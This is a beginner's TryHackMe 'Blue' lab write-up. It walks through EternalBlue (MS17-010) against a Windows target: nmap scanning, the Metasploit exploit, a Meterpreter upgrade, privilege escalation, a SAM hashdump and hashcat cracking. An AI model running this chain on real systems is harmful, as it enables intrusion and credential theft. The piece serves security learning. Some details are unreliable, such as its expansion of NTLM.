TryHackMe: Blue (Eternal Blue)
Hello there, I am beginner in the Infosec field and this is my first article on medium regarding the “Blue” room from TryHackMe.This is the link to the room https://tryhackme.com/room/blue
This article will be in layman’s language as this room is intended basically for beginners.So,lets get started……..
So, first we need to get connected to their network using a VPN(Virtual Private Network)
TryHackMe uses OpenVPN,which is tool in order to connect to their internal network.
You can know more about this in their “OpenVPN” room.
About the vulnerability:
So, as the name of the room,gives us a small hint about the vulnerability or the exploit that can be used for the machine.
Eternal Blue was the exploit used by the world famous WannaCry in order attack Windows bases systems using SMB(Server Message Block).
Fun Fact: The NSA(National Security Agency) knew about this vulnerability and kept it as secret for more
than five years from Microsoft.
Metasploit has a module for this exploit.Its RCE(Remote Code Execution) where a program on the target machine allows execution of a malicious code remotely ,hence compromising the machine.
[ TASK 1 ]: Recon
( #1) First we will start with the nmap scan.
nmap -sC -sV -Pn <machine_ip>
- -sC =script scan
- -sV=version detection
- -Pn=doesnt send ping probes to machine
( #2 )
So,as the nmap scan result show we have 3 ports under 1000
( #3 ) Now again we do a nmap scan to search for vulnerabilities using the NSE(Nmap Script Engine)
nmap -script vuln -Pn <machine_ip>
This scan shows us the following result:
[ TASK 2 ]: Gain Access
( #1 )To start Metasploit:
msfconsole
( #2 ) Now as we know the name of the vulnerability we can search whether there exists some exploit for it in Metasploit.
search ms17–010
Now here we will use the exploit numbered as 2.So,
use 2
( #3 )Each exploit needs a certain options(parameters) to be set.To view the options the command is:
show options
Now we need to set the options which are required and not already set.To know which options are required we need to see the “Required” column for a stating true.
set RHOSTS <machine_ip>
( #4 )After setting the required options we can now run the exploit.
exploit
( #5 )If everything goes well, we will recieve a WIN flag that means the xploit was run successfully on the machine and the session was created.
ctrl+z
Now,we have received shell,but we cannot do much using this shell which we have got.So now we background the session(1st) which we have got and upgrade to a meterpreter shell.For this we we use a payload.A payload is a malicious code which sent to the target which we want the target to execute.
[ TASK 3 ]:Escalate
( #1 ) Now we will upgrade our shell to meterpreter shell using one of the post exploitation modules.
search shell_to_meterpreter
Metasploit returns us a module,which we use using the “use” command.
use 0
( #2) Using “show options” it shows that we need set the session number.Now this session number is the which we had created.Mostly it will be the first session.But in case you want to know the session number you can use the command “show sessions”
show optionsset session 1
Now that we have set all the required options.we are good to go !!Here we will use the “run” command to run the module
run
( #3 )
( #4 )
The underlined indicates that we have successfully opened the 2nd session.
( #5 ) To see all the sessions we have created now we use the;
show sessions
Now we need to interact with the 2nd session
sessions -i 2
( #6)
Now we need to verify our privileges. For that we use the command:
getsystem
getsystem -tells the metasploit to use the various methods and try to get the system privileges.
getuid
getuid-It will display which user are you on the host machine.
NT AUTHORITY\SYSTEM means you are the most powerful user on that system.It also means that you are the root user.
( #7 )To list all the processes running we have the command:
ps
( #8 ) To migrate to a process we have the “migrate” command.We can specify the PID(Process ID) or the name of the process.We migrate to process generally having the NT AUTHORITY\SYSTEM so that we can shift to that process and operate the local system using that privileges.
migrate -P 2740
[ TASK 4 ]:Cracking
( #1 ) The passwords in the Windows are stored in Hash format.Hashing is technique to convert plain text passwords to non-human readable format which are difficult to crack.
Hashdump is command to retrieve the passwords stored in the SAM(Security Account Manager) database where windows stores it user passswords.Using this we get to know the passwords of the different users on the machine.
hashdump
( #2 ) Windows uses NTLM(New Technique Network Manager) type of hashing method to store its password.Generally hashed passwords are difficult to be reversed, but if they exists in the Wordlist(rockyou.txt) they can be cracked using the popular tool called Hashcat.
apt-get install hashcat
Now copy and save the hash in a file named “hashes.txt”.To crack the hash we need to specify the hash type.As we all know Windows uses NTLM type we can lookup for the mode in the help section of Hashcat or we can use HashIdentifier.
hashcat -a 0 -m 1000 hashes.txt <location_of_the_wordlist>
( OR )
simply we can use online hash cracking website. CrackStation
[ TASK 5 ]:Find Flags !
( #1)So,now that we have the local admin rights we traverse throughout the whole system.To find the flags on the system we can take help of the “search”command for search for the flags.We here use a regular expression (‘*’) inorder to find the flags.The ‘*’ sign indicates 0 or more occurrences. That means it searches for file having the “flag” that is the fixed word and any other character after it,returns the result.
search -f flag*.txt
Now that we have got to the flag locations we can traverse the different directories and than view them.We need to learn 3 commands for this:
- pwd=print the current working directory
- dir =lists the files in the current directory
- cd .. =go back
- cat =view the contents of the file
( #2 )
( #3 )
With this we complete our room.I recommend you to try the sequel of this room called “Ice”.
TryHackMe has various rooms for beginners in infosec to get a strong hold on the basics and better understanding the concepts by practically solving them.i recommend y’all to complete TryHackMe rooms first and then jump HackTheBox.
Peace !!